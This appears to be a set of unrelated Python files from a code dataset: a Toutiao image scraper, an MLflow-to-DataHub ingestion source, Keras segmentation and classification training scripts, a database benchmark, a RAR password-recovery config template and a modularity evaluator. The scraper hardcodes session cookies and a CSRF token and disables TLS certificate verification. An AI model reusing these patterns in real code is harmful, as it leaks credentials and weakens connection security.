s_v_web_id=756728ee0426864fb694fd6a08859853; WEATHER_CITY=%E5%8C%97%E4%BA%AC; __tasessionId=yrohurhn91570710376983; tt_webid=6746149885919299083; csrftoken=4124891963a86f58c4180dde49e105f6',\n 'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',\n 'x-requested-with': 'XMLHttpRequest',\n }\n params = {\n 'aid': '24',\n 'app_name': 'web_search',\n 'offset': '0',\n 'format': 'json',\n 'keyword': keyword,\n 'autoload': 'true',\n 'count': '20',\n 'en_qc': '1',\n 'cur_tab': '1',\n 'from': 'search_tab',\n 'pd': 'synthesis',\n }\n\n base_url = 'https://www.toutiao.com/api/search/content/?'\n url = base_url + urlencode(params)\n try:\n res = requests.get(url=url, headers=headers, verify=False)\n if codes.ok == res.status_code:\n return res.json()\n except requests.ConnectionError as e:\n print('Error: ', e.args)\n return None\n\ndef get_images(json):\n if json.get('data'):\n datas = json.get('data')\n for data in datas:\n if not data.get('title'):\n continue\n title = re.sub('[\\t]', '', data.get('title'))\n images = data.get('image_list')\n for image in images:\n if 'pgc-image' in image.get('url'):\n origin_image = re.sub('list.*?pgc-image', 'large/pgc-image', image.get('url'))\n else:\n origin_image = re.sub('list', 'large', image.get('url'))\n yield {\n 'image': origin_image,\n 'title': title,\n }\n\ndef save_image(item):\n if not item.get('image'):\n return\n img_path = os.path.join('image', item.get('title'))\n if not os.path.exists(img_path):\n os.makedirs(img_path)\n try:\n res = requests.get(item.get('image'))\n if codes.ok == res.status_code:\n file_path = os.path.join(img_path, '{file_name}.{file_suffix}'.format(\n file_name = md5(res.content).hexdigest(),\n file_suffix = 'jpg')\n )\n if not os.path.exists(file_path):\n with open(file_path, 'wb') as f:\n f.write(res.content)\n print('Dowloaded image: ', file_path)\n else:\n print('Already Downloaded image: ', file_path)\n except Exception as e:\n print('Error: ', e.args)\n\n\ndef main(offset):\n keyword = '街拍'\n json = get_page(offset, keyword)\n if json == None:\n return\n for image in get_images(json):\n save_image(image)\n\ndef run():\n page_start = 0\n page_end = 1\n groups = (x * 20 for x in range(page_start, page_end+1))\n\n pool = Pool()\n pool.map(main, groups)\n pool.close()\n pool.join()\n\nif __name__ == '__main__':\n run()\n","sub_path":"jiepai.py","file_name":"jiepai.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"325844182","text":"from dataclasses import dataclass, field\nfrom typing import Iterable, List\n\nimport mlflow.sklearn\nfrom datahub.configuration import ConfigModel\nfrom datahub.configuration.common import AllowDenyPattern\nfrom datahub.ingestion.api.common import PipelineContext\nfrom datahub.ingestion.api.source import Source, SourceReport\nfrom datahub.ingestion.source.metadata_common import MetadataWorkUnit\nfrom datahub.metadata import MLModelPropertiesClass\nfrom datahub.metadata.com.linkedin.pegasus2avro.common import VersionTag\nfrom datahub.metadata.com.linkedin.pegasus2avro.metadata.snapshot import MLModelSnapshot\nfrom datahub.metadata.com.linkedin.pegasus2avro.mxe import MetadataChangeEvent\nfrom mlflow.entities import ViewType\n\n\nclass MlFlowConfig(ConfigModel):\n tracking_uri: str\n\n experiment_pattern: AllowDenyPattern = AllowDenyPattern(deny=[\"Default\"])\n path_pattern: str = 'model/model.pkl'\n\n\n@dataclass\nclass MlFlowSourceReport(SourceReport):\n filtered: List[str] = field(default_factory=list)\n\n def report_dropped(self, name: str) -> None:\n self.filtered.append(name)\n\n\nclass MlFlowSource(Source):\n config: MlFlowConfig\n\n def __init__(self, config: MlFlowConfig, ctx: PipelineContext):\n super().__init__(ctx)\n self.config = config\n self.mlflow_client = mlflow.tracking.MlflowClient(tracking_uri=self.config.tracking_uri)\n self.report = MlFlowSourceReport()\n\n @classmethod\n def create(cls, config_dict: dict, ctx: PipelineContext):\n config = MlFlowConfig.parse_obj(config_dict)\n return cls(config, ctx)\n\n def get_workunits(self) -> Iterable[MetadataWorkUnit]:\n platform = 'mlflow'\n env = 'PROD'\n experiments: List[MLModelPropertiesClass] = self.get_mlflow_objects(self.mlflow_client)\n for experiment in experiments:\n if self.config.experiment_pattern.allowed(experiment.name):\n mce = MetadataChangeEvent()\n mlmodel_snapshot = MLModelSnapshot()\n mlmodel_snapshot.urn = f\"urn:li:mlModel:(urn:li:dataPlatform:{platform},{experiment.name}_\" \\\n f\"{experiment.version.versionTag},{env})\"\n\n mlmodel_snapshot.aspects.append(experiment)\n\n mce.proposedSnapshot = mlmodel_snapshot\n\n wu = MetadataWorkUnit(id=f\"{experiment.name}_{experiment.version.versionTag}\", mce=mce)\n self.report.report_workunit(wu)\n yield wu\n else:\n self.report.report_dropped(experiment.name)\n\n def get_mlflow_objects(self, mlflow_client: mlflow.tracking.MlflowClient) -> List[MLModelPropertiesClass]:\n experiment_list = mlflow_client.list_experiments(view_type=ViewType.ACTIVE_ONLY)\n print(experiment_list)\n\n experiments_ids_list = list(map(lambda x: {'id': x.experiment_id, 'name': x.name}, iter(experiment_list)))\n experiments_metadata = []\n for experiment in experiments_ids_list:\n runs = mlflow_client.search_runs(experiment['id'])\n for run in runs:\n experiments_metadata.append(MLModelPropertiesClass(\n name=experiment['name'],\n date=run.info.end_time,\n hyperParameters=run.data.params,\n version=VersionTag(versionTag=run.info.run_id),\n metrics=run.data.metrics\n ))\n\n return experiments_metadata\n\n def get_report(self) -> MlFlowSourceReport:\n return self.report\n","sub_path":"metadata-ingestion/src/datahub/ingestion/source/mlflow.py","file_name":"mlflow.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"126790114","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 16 13:19:28 2017\n\n@author: fly\n\"\"\"\n\nfrom __future__ import print_function\n\nimport numpy as np\nfrom keras.models import Model\nfrom keras.layers import Input, merge, Convolution2D, MaxPooling2D, UpSampling2D,Dropout,Deconvolution2D,BatchNormalization\nfrom keras.optimizers import Adam\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler\nfrom keras import backend as K\n#from keras.utils.vis_utils import model_to_dot, plot_model\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nfrom keras.callbacks import EarlyStopping\nfrom keras.optimizers import SGD\n#from models import model_from_json\n#from data import load_train_data, load_test_data\n#import os\n#os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"3\"\n\nK.set_image_dim_ordering('th') # Theano dimension ordering in this code\n\nimg_rows = 256\nimg_cols = 256\n\nsmooth = 1\n\ndef dice_coef(y_true, y_pred):\n y_true_f = K.flatten(y_true)\n y_pred_f = K.flatten(y_pred)\n intersection = K.sum(y_true_f * y_pred_f)\n return (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)\n\n\ndef dice_coef_loss(y_true, y_pred):\n return -dice_coef(y_true, y_pred)\n\n\ndef get_unet():\n inputs = Input((3, img_rows, img_cols))#3*512*512\n conv1_1 = Convolution2D(32, 3, 3, activation='relu', border_mode='same')(inputs)#64*512*512\n conv1_2 = Convolution2D(32, 3, 3, activation='relu', border_mode='same')(conv1_1)#64*512*512\n # B1=BatchNormalization()(conv1_2)\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1_2)#32*59*59\n \n\n conv2_1 = Convolution2D(64, 3, 3, activation='relu', border_mode='same')(pool1)#64*57*57\n conv2_2 = Convolution2D(64, 3, 3, activation='relu', border_mode='same')(conv2_1)#64*55*55\n # B2=BatchNormalization()(conv2_2)\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2_2)#64*54*54\n \n\n conv3_1 = Convolution2D(128, 3, 3, activation='relu', border_mode='same')(pool2)#128*53*53\n conv3_2 = Convolution2D(128, 3, 3, activation='relu', border_mode='same')(conv3_1)#128*51*51\n # B3=BatchNormalization()(conv3_2)\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3_2)#128*50*50\n \n\n conv4_1 = Convolution2D(256, 3, 3, activation='relu', border_mode='same')(pool3)\n conv4_2 = Convolution2D(256, 3, 3, activation='relu', border_mode='same')(conv4_1)#128*46*46\n # B4=BatchNormalization()(conv4_2)\n pool4 = MaxPooling2D(pool_size=(2, 2))(conv4_2)#256*45*45\n\n conv5_1 = Convolution2D(512, 3, 3, activation='relu', border_mode='same')(pool4)\n conv5_2 = Convolution2D(512, 3, 3, activation='relu', border_mode='same')(conv5_1)#512*41*41\n #B5=BatchNormalization()(conv5_2)\n \n up6 = merge([UpSampling2D(size=(2, 2))(conv5_2), conv4_2], mode='concat', concat_axis=1)\n conv6_1 = Convolution2D(256, 3, 3, activation='relu', border_mode='same')(up6)\n conv6_2 = Convolution2D(256, 3, 3, activation='relu', border_mode='same')(conv6_1)\n # B6=BatchNormalization()(conv6_2)\n\n\n up7 = merge([UpSampling2D(size=(2, 2))(conv6_2), conv3_2], mode='concat', concat_axis=1)\n conv7_1 = Convolution2D(128, 3, 3, activation='relu', border_mode='same')(up7)\n conv7 = Convolution2D(128, 3, 3, activation='relu', border_mode='same')(conv7_1)\n # B7=BatchNormalization()(conv7)\n\n\n up8 = merge([UpSampling2D(size=(2, 2))(conv7), conv2_2], mode='concat', concat_axis=1)\n conv8_1 = Convolution2D(64, 3, 3, activation='relu', border_mode='same')(up8)\n conv8 = Convolution2D(64, 3, 3, activation='relu', border_mode='same')(conv8_1)\n # B8=BatchNormalization()(conv8)\n\n\n up9 = merge([UpSampling2D(size=(2, 2))(conv8), conv1_2], mode='concat', concat_axis=1)\n conv9_1 = Convolution2D(32, 3, 3, activation='relu', border_mode='same')(up9)\n conv9 = Convolution2D(32, 3, 3, activation='relu', border_mode='same')(conv9_1)\n\n output = Convolution2D(1, 1, 1, activation='sigmoid',name='out_put0')(conv9)\n\n\n\n###summary every map\n model = Model(input=inputs, output=output)\n json_string = model.to_json()\n fh = open(\"model_cons.pb\", \"w\")\n fh.write(json_string)\n fh.close()\n \n # visualize model\n # plot_model(model, to_file='U_Net.png',show_shapes=True)\n sgd = SGD(lr=0.0001,decay=1e-6, momentum=0.9, nesterov=True)\n model.compile(optimizer=sgd, loss='binary_crossentropy', metrics=[dice_coef])#'binary_crossentropy'loss_weights=[0.2,0.2,0.2,0.2,0.2,1.0]\n\n return model\n\n\ndef preprocess(imgs):\n imgs=imgs.reshape(imgs.shape[0],1,imgs.shape[-2],imgs.shape[-1])\n return imgs\n\ndef preprocess3(imgs):\n imgs=imgs.reshape(imgs.shape[0],3,imgs.shape[-2],imgs.shape[-1])\n return imgs\n\ndef preprocess1(imgs):\n imgs=imgs.reshape(imgs.shape[0],1,imgs.shape[-2],imgs.shape[-1])\n return imgs\n\n\ndef train_and_predict1():\n print('-'*30)\n print('Loading and preprocessing train data...')\n print('-'*30)\n\n test_x = np.load('imgs_test.npy')\n test_y = np.load('imgs_mask_test.npy')\n test_x=(np.array(test_x))\n test_x = test_x.astype('float32')\n\n\n test_y=(np.array(test_y))/255.0\n test_x = preprocess3(test_x)\n test_y = preprocess1(test_y)\n test_y=test_y.astype('float32')\n\n imgs_train = np.load('imgs_train.npy')\n imgs_mask_train = np.load('imgs_mask_train.npy')\n\n imgs_train=(np.array(imgs_train))\n imgs_train = imgs_train.astype('float32')\n\n imgs_mask_train=(np.array(imgs_mask_train))/255.0\n imgs_mask_train=imgs_mask_train.astype('float32')\n\n imgs_train = preprocess3(imgs_train)\n imgs_mask_train = preprocess1(imgs_mask_train)\n\n\n print('trainsamples',imgs_train.shape)\n print('testsamples',test_x.shape)\n\n\n print('test_y',test_y.shape)\n print('trainsamples',imgs_mask_train.shape)\n\n model = get_unet()\n# model.load_weights('AugUnet1.hdf5')\n# model_checkpoint = ModelCheckpoint('test.hdf5', monitor='val_loss', save_best_only=True)\n model_checkpoint = ModelCheckpoint('test_model_1.hdf5', monitor='val_loss', save_best_only=True) \n#early_stopping = EarlyStopping(monitor='val_loss', patience=1)\n\n print('-'*30)\n print('Fitting model...')\n print('-'*30)\n\n hist= model.fit(imgs_train,imgs_mask_train, batch_size=8, nb_epoch=2000, verbose=2, shuffle=True,validation_data=[test_x,test_y],callbacks=[model_checkpoint])#[imgs_mask_train,imgs_mask_train,imgs_mask_train,imgs_mask_train,imgs_mask_train,imgs_mask_train]\n print(hist.history)\n\n\nif __name__ == '__main__':\n train_and_predict1()\n# model = get_unet()\n# model.load_weights('AugUnet1.hdf5')\n# model.save('new_Unet.hdf5')\n","sub_path":"U-net/test_unet.py","file_name":"test_unet.py","file_ext":"py","file_size_in_byte":6492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"552537671","text":"import os\nimport numpy as np\nimport tensorflow as tf\nfrom config import Config\nfrom ops import tf_fun\nfrom glob import glob\nimport pandas as pd\n\n\nclass data_processing(object):\n def __init__(self):\n self.name = 'uw_challenge'\n self.output_name = 'uw_challenge'\n self.img_dir = 'imgs'\n self.image_data = '/media/data_cifs/Sheinberg_lab/data/cleaned_images/bold5000_cleaned.npy'\n self.neural_data = '/media/data_cifs/Sheinberg_lab/data/cleaned_images/bold5000_sqrt_of_numspk_responsiveCells_cleaned.csv'\n self.config = Config()\n self.im_size = [375, 375, 3] # 600, 600\n self.model_input_image_size = [224, 224, 3] # [107, 160, 3]\n self.output_size = [235]\n self.label_size = self.output_size\n self.default_loss_function = 'cce'\n self.score_metric = 'accuracy'\n self.store_z = False\n self.z_score_neurons = True\n self.normalize_im = False\n self.all_flips = True\n self.shuffle = True\n self.test_data_split = 50\n self.input_normalization = 'none' # 'zscore'\n self.preprocess = ['resize'] # ['resize_nn']\n self.meta = os.path.join('metadata', 'combined.npy')\n self.folds = {\n 'train': 'train',\n 'val': 'val',\n 'test': 'test'\n }\n self.targets = {\n 'image': tf_fun.bytes_feature,\n 'label': tf_fun.float_feature,\n }\n self.tf_dict = {\n 'image': tf_fun.fixed_len_feature(dtype='string'),\n 'label': tf_fun.fixed_len_feature(dtype='float32'),\n }\n self.tf_reader = {\n 'image': {\n 'dtype': tf.float32,\n 'reshape': self.im_size\n },\n 'label': {\n 'dtype': tf.float32,\n 'reshape': self.output_size\n }\n }\n\n def get_data(self, split_start=None, split_size=None):\n \"\"\"Get the names of files.\"\"\"\n if split_start is None:\n split_size, split_start = 50, 0 # Take first 50 images for validation\n image_data = np.load(self.image_data)\n\n # image_data = image_data[..., [2, 1, 0]]\n neural_data = pd.read_csv(self.neural_data)\n train_images = image_data[self.test_data_split:]\n test_images = image_data[:self.test_data_split]\n train_labels = neural_data.as_matrix()[self.test_data_split:, 1:] # First column is index\n test_labels = neural_data.as_matrix()[:self.test_data_split, 1:]\n\n # Create validation set\n val_idx = np.in1d(np.arange(len(train_images)), np.arange(split_start, split_start + split_size))\n val_images = train_images[val_idx]\n val_labels = train_labels[val_idx]\n # assert not np.sum(np.isnan(val_labels))\n train_images = train_images[~val_idx]\n train_labels = train_labels[~val_idx]\n if self.z_score_neurons:\n train_mean = np.nanmean(train_labels, axis=0, keepdims=True)\n train_std = np.nanstd(train_labels, axis=0, keepdims=True)\n np.savez(os.path.join('moments', self.output_name), mean=train_mean, std=train_std)\n # train_labels = (train_labels - train_mean) / train_std\n # val_labels = (val_labels - train_mean) / train_std\n train_labels[np.isnan(train_labels)] = 0. # -99.\n val_labels[np.isnan(val_labels)] = 0. # -99.\n\n # Build CV dict\n cv_files, cv_labels, cv_masks = {}, {}, {}\n cv_files[self.folds['train']] = train_images\n cv_files[self.folds['val']] = val_images\n cv_files[self.folds['test']] = test_images\n cv_labels[self.folds['train']] = train_labels\n cv_labels[self.folds['val']] = val_labels\n cv_labels[self.folds['test']] = test_labels\n cv_masks[self.folds['train']] = train_images\n cv_masks[self.folds['val']] = val_images\n cv_masks[self.folds['test']] = test_images\n return cv_files, cv_labels, cv_masks\n\n","sub_path":"datasets/ruobing_bold_5000.py","file_name":"ruobing_bold_5000.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"464043827","text":"#! /usr/bin/python3\n\nimport sys\nsys.path.append('../../')\nimport os\nimport signal\nimport time\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom ivy.std_api import *\nimport logging\n\nimport nephelae_paparazzi.pprzinterface as ppint\nimport nephelae_paparazzi.pprzinterface.messages as pmsg\nfrom nephelae_base.types import *\nfrom nephelae_mapping.database import SpatializedDatabase\nfrom nephelae_mapping.database import NephelaeDataServer\n\nfrom helpers.helpers import *\n\n\ndtbase = NephelaeDataServer()\n# dtbase.enable_periodic_save('output/database_perf01.neph', 60.0, True)\ndtbase.set_navigation_frame(pmsg.NavigationRef(\"100 NAVIGATION_REF 0.0 0.0 31 0.0\"))\ndtbase.navFrame.stamp = 0.0\n\nuavIds = ['100', '101', '102', '103', '104']\nvarPeriod= 5\nvarNames = ['var_'+str(i) for i in range(5*varPeriod)]\ngpsSig = 2000.0\ndataSig = 10.0\nN = 5*3600\nt = []\ntry:\n t0 = time.time()\n for n in range(N):\n # for n in range(10):\n if int(100 * n / N) == 100.0*n / N:\n t1 = time.time()\n print(\"Filling database... (\"+str(int(100*n/N))+\"% : \"+str(n)+\"/\"+str(N)+\")\")\n print(\" - \", format(1000000.0*(t1 - t0) / (len(uavIds)*(len(varNames) + 1)*N) * 100.0, \".2f\"),\n \"us per insert. (total : \", n*(len(uavIds)*(len(varNames) + 1)), \"inserted)\")\n t.append(1000000.0*(t1 - t0) / (len(uavIds)*(len(varNames) + 1)*N) * 100.0)\n t0 = t1\n for uavId in uavIds:\n gpsx = random.gauss(0.0, gpsSig)\n gpsy = random.gauss(0.0, gpsSig)\n gpsz = random.gauss(0.0, gpsSig)\n gps = pmsg.Gps(uavId+\" GPS 3 \"+str(int(gpsx))+' '+str(int(gpsy))+' 0 '+str(int(gpsz))+\n ' 0 0 0 0 31 0')\n gps.stamp = n\n dtbase.add_gps(gps)\n \n if n % varPeriod == 0:\n for var in varNames:\n sample = SensorSample(var, uavId, n, gps - dtbase.navFrame, \n [random.gauss(0.0, dataSig)])\n dtbase.add_sample(sample)\n \nfinally: \n fig, axes = plt.subplots(1,1)\n axes.plot(np.linspace(0, (len(uavIds)*(len(varNames) + 1)*N), len(t)) ,t, label=\"insert time\")\n axes.set_xlabel(\"database size\")\n axes.set_ylabel(\"insert time (us)\")\n axes.grid()\n plt.show(block=False)\n # dtbase.disable_periodic_save()\n # dtbase.save('output/database_perf02.neph', True)\n dtbase.save('output/database_perf03.neph', True)\n\n\n\n\n\n","sub_path":"tests/database/database_perf_build01.py","file_name":"database_perf_build01.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"583237704","text":"import json\nfrom pathlib import Path\n\n_file = 'check_the_path_of_input.json'\n_file = Path(_file)\n\n\nclass RpInput(object):\n\tdef __init__(self):\n\t\tself.port_rp = {\n\t\t\t'file': 'c:/users/tt/desktop/smf.rar',\n\t\t\t'ele_file': 'c:/users/tt/desktop/ele.txt',\n\t\t\t'dict_file': 'c:/users/tt/desktop/dict.txt',\n\t\t\t'log_file': 'c:/users/tt/desktop/log.txt',\n\t\t\t'max_length': '32'\n\t}\n\ndict_template = RpInput().__dict__;\n\n\nif _file.is_file() == True and _file.exists()==True:\n\tprint('file already exists, check it again please.')\nelse:\n\twith open(_file,'w',encoding='utf-8') as w:\n\t\tjson.dump(dict_template,w)\n\n","sub_path":"daily_codes/rar_password_recall/gen_input_ini.py","file_name":"gen_input_ini.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"491867682","text":"\"\"\"\nGiven 2D xy_embedding_csv file, evaluate the modularity,\nWe want dense connection between nodes within modules but sparse connection between modules\nHigh modularity corresponds to good community structure\n\nThe bash input should be map_directory, xy_embeddings_csv, cluster_groups_csv,\nand network construction method 'nn' or 'distance'\n\nTo install igraph\nbrew install cairo\nbrew install pkg-config\nbrew install igraph\nsudo pip install python-igraph\n\nAuthor: Yuren 'Rock' Pang\n\"\"\"\nimport argparse\nimport math\nfrom sklearn.neighbors import NearestNeighbors\nimport pandas as pd\nfrom igraph import *\nimport logging\nimport json\n\n\ndef preprocess(x_y_embeddings_csv):\n df = x_y_embeddings_csv\n feature_space = []\n indices_to_id = {}\n\n for index, row in df.iterrows():\n feature_space.append([row['x'], row['y']])\n indices_to_id[index] = int(row['article_id'])\n\n return feature_space, indices_to_id\n\n\ndef find_k_near_neighbors(feature_space, k=15):\n \"\"\"\n Given a 2-D csv file, find the k-nearest neighbors with 2 output csv file\n indices_dic: article_id : neighbors_with_id\n distance_dic: article_id : neighbors_distance\n\n :param x_y_embeddings_csv:\n :param k:\n :return:\n \"\"\"\n nbrs = NearestNeighbors(n_neighbors=k, algorithm='ball_tree').fit(feature_space)\n\n return nbrs.kneighbors(feature_space) # the output is two lists: distance and indices\n\n\ndef find_neighbors_within_d_distance(feature_space, d = 3):\n distances_lst = []\n neighbors_lst = []\n\n for center in range(len(feature_space)):\n center_x = feature_space[center][0]\n center_y = feature_space[center][1]\n\n distances = [0]\n neighbors = [center]\n\n for point in range(len(feature_space)):\n if center == point:\n continue\n x = feature_space[point][0]\n y = feature_space[point][1]\n a2b2 = (x-center_x) * (x-center_x) + (y-center_y) * (y-center_y)\n if a2b2 <= d * d:\n neighbors.append(point)\n distances.append(math.sqrt(a2b2))\n neighbors_lst.append(neighbors)\n distances_lst.append(distances)\n\n return distances_lst, neighbors_lst\n\n\ndef build_network(distances_lst, neighbors_lst, indices_to_id):\n edges = []\n weights = []\n\n for node in range(0, len(neighbors_lst)): # default id, not the article id !!\n node_list = neighbors_lst[node]\n for neighbor in range(1, len(node_list)):\n if len(node_list) <= 1:\n continue\n else:\n edges.append(tuple((node_list[0], node_list[neighbor])))\n weights.append(distances_lst[node][neighbor])\n G = Graph()\n G.add_vertices(len(neighbors_lst))\n\n names = [indices_to_id[index] for index in G.vs.indices]\n G.vs['name'] = names\n\n G.add_edges(edges)\n G.es['weight'] = weights\n\n return G.simplify(combine_edges=max)\n\n\ndef calc_modularity(Graph, cluster_groups_csv):\n \"\"\"\n Here We could choose 9 different measurement to test the modularity score\n The higher the better the cluster we produce\n Reference: https://yoyoinwanderland.github.io/2017/08/08/Community-Detection-in-Python/\n \"\"\"\n cluster_groups = cluster_groups_csv\n country = cluster_groups['country'].tolist()\n\n #vertex_clustering = Graph.community_multilevel(weights='weight')\n return Graph.modularity(country)\n\n\ndef main(xy_embedding_csv, cluster_groups_csv, method='nn'):\n xy_embeddings_csv = pd.read_csv(args.xy_embeddings_csv)\n feature_space, indices_to_id = preprocess(xy_embeddings_csv)\n\n if method == 'nn':\n distance_lst, indices_lst = find_k_near_neighbors(feature_space)\n else:\n distance_lst, indices_lst = find_neighbors_within_d_distance(feature_space)\n\n G = build_network(distance_lst, indices_lst, indices_to_id)\n mod_score = calc_modularity(G, cluster_groups_csv)\n print(str(json.dumps({\"Modularity Score: %.6f\": mod_score})))\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Augment the original article vectors with label matrix or '\n 'cluster matrix.')\n parser.add_argument('--experiment', required=True)\n parser.add_argument('--xy_embeddings_csv', required=True)\n parser.add_argument('--method', required=True)\n parser.add_argument('--cluster_groups_csv', required=True)\n args = parser.parse_args()\n cluster_vectors = pd.read_csv(args.cluster_groups_csv)\n main(args.xy_embeddings_csv, cluster_vectors, args.method)\n","sub_path":"cartograph/evaluation/modularity_evaluator.py","file_name":"modularity_evaluator.py","file_ext":"py","file_size_in_byte":4561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"62981315","text":"from sklearn.model_selection import train_test_split\nfrom keras.utils import np_utils\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras import optimizers\nimport model_all\nimport data_read_all\nimport matplotlib.pyplot as plt\nfrom keras import callbacks\n\n\n# Global Constants\nNB_CLASS = 20\nIM_WIDTH = 150\nIM_HEIGHT = 150\ntrain_root = './train_dir/train'\nvaildation_root = './train_dir/test'\ntest_root = './train_dir/test'\nbatch_size = 32\nEPOCH = 5\nflag_enhance = True\nCHANNELS = 3\nflag_color = True\nflag_continue = False\nmodel_name = './out_model/inception_resnet_v1_0.5122749591322461.h5'\n\nsgd = optimizers.SGD(lr=0.01, momentum=0.9, nesterov=True)\nadadelta = optimizers.Adadelta(lr=0.01, rho=0.95, epsilon=1e-06)\n\nnb_filter_reduction_factor = 8\n\n\nclass LossHistory(callbacks.Callback):\n def on_train_begin(self, logs={}):\n self.losses = {'batch': [], 'epoch': []}\n self.accuracy = {'batch': [], 'epoch': []}\n self.val_loss = {'batch': [], 'epoch': []}\n self.val_acc = {'batch': [], 'epoch': []}\n\n def on_batch_end(self, batch, logs={}):\n self.losses['batch'].append(logs.get('loss'))\n self.accuracy['batch'].append(logs.get('acc'))\n self.val_loss['batch'].append(logs.get('val_loss'))\n self.val_acc['batch'].append(logs.get('val_acc'))\n\n def on_epoch_end(self, batch, logs={}):\n self.losses['epoch'].append(logs.get('loss'))\n self.accuracy['epoch'].append(logs.get('acc'))\n self.val_loss['epoch'].append(logs.get('val_loss'))\n self.val_acc['epoch'].append(logs.get('val_acc'))\n\n def loss_plot(self, loss_type):\n iters = range(len(self.losses[loss_type]))\n plt.figure()\n # acc\n plt.plot(iters, self.accuracy[loss_type], 'r', label='train acc')\n # loss\n plt.plot(iters, self.losses[loss_type], 'g', label='train loss')\n if loss_type == 'epoch':\n # val_acc\n plt.plot(iters, self.val_acc[loss_type], 'b', label='val acc')\n # val_loss\n plt.plot(iters, self.val_loss[loss_type], 'k', label='val loss')\n plt.grid(True)\n plt.xlabel(loss_type)\n plt.ylabel('acc-loss')\n plt.legend(loc=\"upper right\")\n plt.show()\n\n\ndef no_enhance():\n # load data\n X, y = data_read_all.load_data_use_csv('./train_dir_raw', './csv_train.csv',\n 'FILE_ID', 'CATEGORIES', IM_WIDTH, IM_HEIGHT, flag_color)\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=30)\n print(X_train.shape)\n print(X_test.shape)\n print(y_train.shape)\n print(y_test.shape)\n\n X_train = X_train.reshape(-1, IM_WIDTH, IM_HEIGHT, CHANNELS)\n X_test = X_test.reshape(-1, IM_WIDTH, IM_HEIGHT, CHANNELS)\n y_train = np_utils.to_categorical(y_train, num_classes=NB_CLASS)\n y_test = np_utils.to_categorical(y_test, num_classes=NB_CLASS)\n\n print(X_train.shape)\n print(X_test.shape)\n print(y_train.shape)\n print(y_test.shape)\n\n print(\"Changing succeeded!\")\n\n print('Training ------------')\n\n # Another way to train the model\n if flag_continue:\n model = model_all.load_model_from_path(model_name, X_test, y_test)\n else:\n model = model_all.inception_resnet_v1(IM_WIDTH, IM_HEIGHT, CHANNELS, NB_CLASS, nb_filter_reduction_factor)\n\n for i in range(20):\n print('model create(load) succeeded')\n model.fit(X_train, y_train, epochs=EPOCH, batch_size=batch_size, )\n\n print('\\nTesting ------------')\n # Evaluate the model with the metrics we defined earlier\n loss, accuracy = model.evaluate(X_test, y_test)\n\n print('\\ntest loss: ', loss)\n print('\\ntest accuracy: ', accuracy)\n\n model.save('./out_model/resnet_classifier_' + str(accuracy) + '.h5') # HDF5文件\n print('\\nSuccessfully saved model')\n\n\ndef data_enhance():\n\n history = LossHistory()\n\n if flag_continue:\n model = model_all.load_model_from_path(model_name)\n else:\n model = model_all.inception_resnet_v1(IM_WIDTH, IM_HEIGHT, CHANNELS, NB_CLASS, nb_filter_reduction_factor)\n\n print('model create(load) succeeded')\n\n # enhance\n\n train_datagen = ImageDataGenerator(\n rescale=1. / 255,\n rotation_range=40,\n channel_shift_range=30,\n width_shift_range=0.2,\n height_shift_range=0.2,\n horizontal_flip=True)\n\n test_datagen = ImageDataGenerator(rescale=1. / 255,)\n\n train_generator = train_datagen.flow_from_directory(\n './train_dir/train',\n target_size=(IM_WIDTH, IM_HEIGHT),\n batch_size=batch_size,\n shuffle=True)\n\n # this is a similar generator, for validation data\n validation_generator = test_datagen.flow_from_directory(\n './train_dir/validation',\n target_size=(IM_WIDTH, IM_HEIGHT),\n batch_size=batch_size, )\n\n for i in range(20):\n model.fit_generator(\n train_generator,\n steps_per_epoch=150,\n nb_epoch=EPOCH,\n validation_data=validation_generator,\n validation_steps=validation_generator.n / batch_size,\n callbacks=[history])\n\n loss, acc = model.evaluate_generator(validation_generator,\n validation_generator.n / batch_size, use_multiprocessing=False)\n model.save('./out_model/inception_resnet_v1_'+str(acc)+'.h5') # HDF5文件,pip install h5py\n print('\\nSuccessfully saved model')\n\n\nif __name__ == '__main__':\n if flag_enhance:\n data_enhance()\n else:\n no_enhance()\n","sub_path":"VGG_network/inception_resnet_v2.py","file_name":"inception_resnet_v2.py","file_ext":"py","file_size_in_byte":5599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"607398431","text":"import paho.mqtt.publish as publish\nimport RPi.GPIO as GPIO\nfrom telegram import (InlineKeyboardButton, InlineKeyboardMarkup)\n\nclass SimpleLights:\n\tdef __init__(self, database):\n\t\tself.db = database\n\t\tself.lightPin = 21\n\t\tGPIO.setmode(GPIO.BCM)\n\t\tGPIO.setup(self.lightPin, GPIO.OUT)\n\t\tGPIO.output(self.lightPin, 0)\n\t\tself.simple_light_names = {1: \"Down\", 2: \"Up\"}\n\t\t\n\tdef set_Status(self, status, id):\n\t\tif int(id) == 2:\n\t\t\tGPIO.output(self.lightPin, not int(status))\n\t\tself.db.execute_Query(\"UPDATE simpleLights SET status 